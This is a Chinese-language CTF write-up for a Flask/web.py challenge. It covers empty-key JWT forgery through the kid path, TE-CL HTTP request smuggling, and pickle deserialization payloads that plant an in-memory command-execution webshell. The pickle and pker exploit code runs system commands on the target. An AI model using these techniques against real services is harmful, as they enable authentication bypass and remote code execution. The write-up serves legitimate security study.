目录
step0 题目信息
step1 jwt空密钥伪造
step1.5 有关TE&CL的lab
step2 TE-CL请求走私
payload1
payload2
step0 题目信息
注意到题目源码前端是flask写的,后端是web.py写的
frontend
from flask import Flask, request, redirect, render_template_string, make_response
import jwt
import json
import http.clientapp = Flask(__name__)login_form = """
<form method="post">Username: <input type="text" name="username"><br>Password: <input type="password" name="password"><br><input type="submit" value="Login">
</form>
"""@app.route('/', methods=['GET'])
def index():token = request.cookies.get('token')if token and verify_token(token):return "Hello " + jwt.decode(token, algorithms=["HS256"], options={"verify_signature": False})["username"]else: return redirect("/login", code=302)@app.route('/login', methods=['GET', 'POST'])
def login():if request.method == "POST":user_info = {"username": request.form["username"], "isadmin": False}key = get_key("frontend_key")token = jwt.encode(user_info, key, algorithm="HS256", headers={"kid": "frontend_key"})resp = make_response(redirect("/", code=302))resp.set_cookie("token", token)return respelse:return render_template_string(login_form)@app.route('/backend', methods=['GET', 'POST'])
def proxy_to_backend():forward_url = "python-backend:8080"conn = http.client.HTTPConnection(forward_url)method = request.methodheaders = {key: value for (key, value) in request.headers if key != "Host"}data = request.datapath = "/"if request.query_string:path += "?" + request.query_string.decode()conn.request(method, path, body=data, headers=headers)response = conn.getresponse()return response.read()@app.route('/admin', methods=['GET', 'POST'])
def admin():token = request.cookies.get('token')if token and verify_token(token):if request.method == 'POST':if jwt.decode(token, algorithms=['HS256'], options={"verify_signature": False})['isadmin']:forward_url = "python-backend:8080"conn = http.client.HTTPConnection(forward_url)method = request.methodheaders = {key: value for (key, value) in request.headers if key != 'Host'}data = request.datapath = "/"if request.query_string:path += "?" + request.query_string.decode()if headers.get("Transfer-Encoding", "").lower() == "chunked":data = "{}\r\n{}\r\n0\r\n\r\n".format(hex(len(data))[2:], data.decode())if "BackdoorPasswordOnlyForAdmin" not in data:return "You are not an admin!"conn.request(method, "/backdoor", body=data, headers=headers)return "Done!"else:return "You are not an admin!"else:if jwt.decode(token, algorithms=['HS256'], options={"verify_signature": False})['isadmin']:return "Welcome admin!"else:return "You are not an admin!"else: return redirect("/login", code=302)def get_key(kid):key = ""dir = "/app/"try:with open(dir+kid, "r") as f:key = f.read()except:passprint(key)return keydef verify_token(token):header = jwt.get_unverified_header(token)kid = header["kid"]key = get_key(kid)try:payload = jwt.decode(token, key, algorithms=["HS256"])return Trueexcept:return Falseif __name__ == "__main__":app.run(host = "0.0.0.0", port = 8081, debug=False)
backend
import web
import pickle
import base64urls = ('/', 'index','/backdoor', 'backdoor'
)
web.config.debug = False
app = web.application(urls, globals())class index:def GET(self):return "welcome to the backend!"class backdoor:def POST(self):data = web.data()# fix this backdoorif b"BackdoorPasswordOnlyForAdmin" in data:return "You are an admin!"else:data = base64.b64decode(data)pickle.loads(data)return "Done!"if __name__ == "__main__":app.run()
step1 jwt空密钥伪造
jwt解密的过程是去jwttoken的header中取kid字段,然后对其拼接/app/得到文件路径,但我们不知道secretkey在哪个文件中,这里只要指定一个不存在的文件名就可以用空密钥去解密
且后续也不会去验证签名的合法性
指定一个加密的空密钥,再把取解密密钥的路径置空
带着token去访问./admin,发现成功伪造
拿到admin之后我们就可以去请求后端 /backdoor 接口
要访问 /backdoor 接口,请求体要有 BackdoorPasswordOnlyForAdmin ,但后端想要执行pickle反序列化又不能有这段字符串,二者显然矛盾
step1.5 有关TE&CL的lab
我们可以实验下,请求头中有Transfer-Encoding时服务器接收的数据是怎样的
from flask import Flask, requestapp = Flask(__name__)@app.route('/admin', methods=['GET', 'POST'])
def admin():if request.method == 'POST':data1 = request.dataprint("这是前端接收到的数据")print(data1)data2 = "{}\r\n{}\r\n0\r\n\r\n".format(hex(len(data1))[2:], data1.decode())print("这是前端向后端发的数据")print(data2)if __name__ == "__main__":app.run(host = "0.0.0.0", port = 8081, debug=False)bp发包的时候记得把repeater的Update content length关掉
(从上图bp发包可以看到,当Transfer-Encoding和Content-Length共存的时候,flask会优先按TE去解析,哪怕CL长度为1也不影响)
本地起的服务成功打印出接收的data,就是将我们传的分块数据进行了一个拼接
向后端传的data,b8=9c+1c,就是进行了一个TE的格式化处理
至于后端接收的原始数据(暂时忽略Content-Length),显然就是
gANjYnVpbHRpbnMKZXZhbApxAFhUAAAAYXBwLmFkZF9wcm9jZXNzb3IoKGxhbWJkYSBzZWxmIDogX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IC9TZWNyM1RfRmxhZycpLnJlYWQoKSkpcQGFcQJScQMuBackdoorPasswordOnlyForAdmin
不作赘述
step2 TE-CL请求走私
于是就来到了本题的重头戏:浅谈HTTP请求走私
考虑前后端对HTTP报文的解析差异
后端web.py的web.data()对传入data有这样一段处理
就是说Transfer-Encoding 不为 chunked 就会走CL解析,这里可以用大写绕过chunked
前端flask对请求头的Transfer-Encoding判断时有一个小写的处理,这说明flask底层处理http报文不会将其转小写(否则就是多此一举),因而传往后端的headers中Transfer-Encoding仍然是大写的,这也就支持了上述绕过。
走过判断后,又对data手动进行了一个分块传输的格式处理
伪造一个恶意CL长度,就可以实现将特定的某一段字符传入后端(BackdoorPasswordOnlyForAdmin之前字符的长度。后端不会接收到,但是前端可以),这样一来就绕过了对于BackdoorPasswordOnlyForAdmin的检测,进行pickle反序列化,靶机不出网,可以结合web.py的add_processor方法注内存马(就是在访问路由后执行lambda表达式命令)
payload1
import pickle
import base64class A(object):def __reduce__(self):return (eval, ("app.add_processor((lambda self : __import__('os').popen('cat /Secr3T_Flag').read()))",))a = A()
a = pickle.dumps(a)
print(base64.b64encode(a))Content-Length就是base64编码的长度
打入后直接访问/backend路由即可命令执行
payload2
用pker生成opcode再转base64
GitHub - EddieIvan01/pker: Automatically converts Python source code to Pickle opcode
exp.py
getattr = GLOBAL('builtins', 'getattr')
dict = GLOBAL('builtins', 'dict')
dict_get = getattr(dict, 'get')
globals = GLOBAL('builtins', 'globals')
builtins = globals()
a = dict_get(builtins, '__builtins__')
exec = getattr(a, 'exec')
exec('index.GET = lambda self:__import__("os").popen(web.input().cmd).read()')
returnpython3 pker.py < exp.py | base64 -w 0
改一下Content-Length
访问./backend?cmd=cat /Secr3T_Flag
